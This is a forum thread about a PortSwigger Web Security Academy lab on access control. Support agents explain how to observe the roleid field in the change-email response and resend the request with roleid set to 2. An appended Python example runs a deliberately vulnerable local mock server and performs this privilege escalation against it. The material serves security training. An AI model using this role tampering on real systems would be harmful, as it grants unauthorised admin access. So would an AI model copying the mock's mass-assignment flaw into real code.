
How can I "Observe that the response contains your role ID."

Ludovico Dec 28, 2019 01:43PM UTC

Hi, I'm stuck at the fourth exercise of the Web Security Academy lab.

https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

SOLUTION:
Log in using the supplied credentials. [DONE]
Click on "My Account" and submit a new email address. [DONE]
Observe that the response contains your role ID. [NO, CAN'T OBSERVE ANYTHING.]

What I already did:
I went to Proxy -> Options -> Intercept Server Responses and enabled "Intercept responses based on the following rules". Then I tried various combinations like this one:
"OPERATOR: Or;
MATCH TYPE: Content type header;
RELATIONSHIP: Matches;
CONDITION: json".
But it's useless; it always shows only three responses, none of which shows roleid. They all do show non-Unicode characters at the end, like ”–Z>9h`Y{ý’¹ü@à˜Üê‡ÿØ+§¹Ù. Is this the way roleid is displayed? Should I use the given API key in some way to decode these characters?

Thanks for the attention.


Hannah Law Dec 31, 2019 11:17AM UTC Support Center agent

If you go to your HTTP history, you should see a POST request for your “change email” submission. If you click on that and navigate to the Response tab, you should see some JSON with the information required.

You could also turn Intercept on just before you press the update email button, which would save you having to go through your HTTP history.


Bob Jones Jan 06, 2020 09:26PM UTC
I'm having the same problem, though using browser dev tools instead of Burp Suite. I wonder if something has changed in the Lab files? In my HTTP history, I don't see any response data at all -- the "change email" submission just returns a 302 redirect back to the main store page (expected behavior as per the JavaScript code in changeEmail.js). No JSON data is provided from the server.

Also, submitting a "roleid": 2 value anyways causes an error on the server. I get a response back that either says "{"error":"Read timeout after 10000ms"}" with status code 400, or "Internal Server Error" with status code 500. I wonder if something on the back-end is not working correctly?

Any chance to verify this?

Thanks for the great exercises!

Ben Wright Jan 07, 2020 09:24AM UTC Support Center agent

Hi Bob,

I just tried this lab (using Burp) and was able to successfully solve it using the solution provided. As mentioned previously, the “change email” action should create a POST request in your HTTP history and the server response, for me, contains the following JSON:

{
  "username": "wiener",
  "email": "test@hotmail.com",
  "apikey": "9euwcuw2lUdnLBqaryQbdT9kBwvR4HqO",
  "roleid": 1
}

I can then resend the POST request with the following JSON included in the body:

{"email": "test@hotmail.com", "roleid": 2}

Perhaps you could try to complete the lab using a version of Burp to see if that makes any difference?


Bob Jones Jan 08, 2020 01:36AM UTC
Hi Ben, thanks for the response. I've gotten the exercise to work using Python and by not following the redirects -- something the browser does automatically with no way I can find to prevent it. I assume Burp Suite does something similar under the covers and that is why it works with Burp.

Thanks!

Ben Wright Jan 08, 2020 08:38AM UTC Support Center agent

Hi Bob,

Yes, you are correct. The Burp Repeater tool, which is generally used to manipulate and reissue requests for testing, allows you to configure how redirects are handled, with the default being that they are not followed automatically.

Glad to hear that you were able to solve the issue and proceed with the lab.

Please let us know if you require any further assistance with anything else in the future.
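Added example (not part of the thread, and not PortSwigger's or the lab's own code) illustrating the two points made above: the JSON that the "change email" response carries, and why a client that follows the 302 never shows it. The script runs a small local stand-in for the lab, in which the endpoint path /my-account/change-email, the user record and the mass-assignment behaviour are all assumptions, and then replays the request twice: once with http.client, which never follows redirects, and once with urllib, which follows them the way a browser does.

```python
"""Replay the change-email POST without following the 302, read the JSON in
the redirect response, and resend it with roleid set to 2.

Constructed stand-in for the lab: the path, user record and backend
behaviour below are assumptions, not the real lab's implementation."""
import http.client
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Constructed user record (assumption: the real lab stores something similar).
USER = {"username": "wiener", "email": "wiener@normal-user.net",
        "apikey": "0000000000000000000000000000000000", "roleid": 1}


class MockLab(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the example quiet
        pass

    def do_POST(self):
        if self.path != "/my-account/change-email":
            self.send_error(404)
            return
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.headers.get("Content-Type", "").startswith("application/json"):
            fields = json.loads(raw)
        else:
            fields = {k: v[0] for k, v in parse_qs(raw.decode()).items()}
        # Mass assignment: every submitted field that exists on the record is
        # copied across, including roleid, which is the lab's flaw.
        for key, value in fields.items():
            if key in USER:
                USER[key] = int(value) if key == "roleid" else value
        body = json.dumps(USER).encode()
        # Redirect back to the account page, with the updated record as body.
        self.send_response(302)
        self.send_header("Location", "/my-account")
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        body = b"<html>account page</html>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_mock_lab():
    """Start the stand-in server on a free loopback port and return the port."""
    srv = HTTPServer(("127.0.0.1", 0), MockLab)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


def post_change_email(port, payload):
    """Send the POST with http.client, which never follows redirects, so the
    302 response and its JSON body come back as-is. Returns (status, dict)."""
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request("POST", "/my-account/change-email", body=json.dumps(payload),
                 headers={"Content-Type": "application/json"})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, json.loads(data)


def post_change_email_following_redirect(port, payload):
    """Same request via urllib, which follows the 302 like a browser: the
    caller only ever sees the account page, never the JSON. Returns (status, bytes)."""
    req = urllib.request.Request(
        f"http://127.0.0.1:{port}/my-account/change-email",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.status, resp.read()


def escalate(port):
    """Observe roleid in the first response, then resend with roleid: 2.
    Returns (roleid before, roleid after)."""
    _, first = post_change_email(port, {"email": "test@hotmail.com"})
    _, second = post_change_email(port, {"email": "test@hotmail.com", "roleid": 2})
    return first["roleid"], second["roleid"]


if __name__ == "__main__":
    p = start_mock_lab()
    print("roleid before/after:", escalate(p))
    print("following the redirect instead:", post_change_email_following_redirect(p, {"email": "x@y.z"}))
```

The design point is in the two client functions: http.client returns whatever the server sent, 302 and body included, which is the same behaviour Burp Repeater has by default, while urllib (and a browser) silently swaps the 302 for the GET of the Location target, so the JSON you are meant to observe never reaches you.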

